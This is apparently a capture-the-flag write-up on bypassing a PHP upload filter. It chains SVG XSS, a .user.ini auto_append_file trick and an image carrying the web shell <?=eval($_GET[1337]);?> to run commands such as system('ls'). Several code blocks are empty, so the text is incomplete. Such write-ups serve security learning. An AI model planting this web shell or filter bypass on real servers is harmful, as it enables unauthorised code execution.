Very quick little write-up:
Get a friend account using XSS in SVG:
| |
Now you can upload a small file (20 characters) without any blacklisted keywords (system, exec, `, …) or blacklisted endings (php, .ht*, …). We noticed the header X-Powered-By: PHP-fpm/5.6, so we uploaded a .user.ini file. This is a configuration INI file that works on a per-directory basis.
| |
auto_append_file will automatically parse the given file after the main file. So we can upload a 20-character PHP file called xx. As this is too short for a real shell (is it? usort magic maybe?) we copy an image with PHP code in it to a shorter name, so we can have it auto-appended. This way we do not have to deal with the character limit and keyword blacklist.
The xx file will be included:
| |
1.jpg is an image with <?=eval($_GET[1337]);?> as a comment:
.jpg)
Now we browse to upload/[md5]/index.php, so that 1.jpg will be copied to 1, and we can update the .user.ini file to point to it. Now we can execute code like this: upload/[md5]index.php?1337=system('ls');
Very interesting PHP-golf challenge; I had hoped I would find a 20-character full shell so this would work without the pictures. Shortest I could come up with was:
| |
(24 characters) WORK IN PROGRESS!
Filter:
| |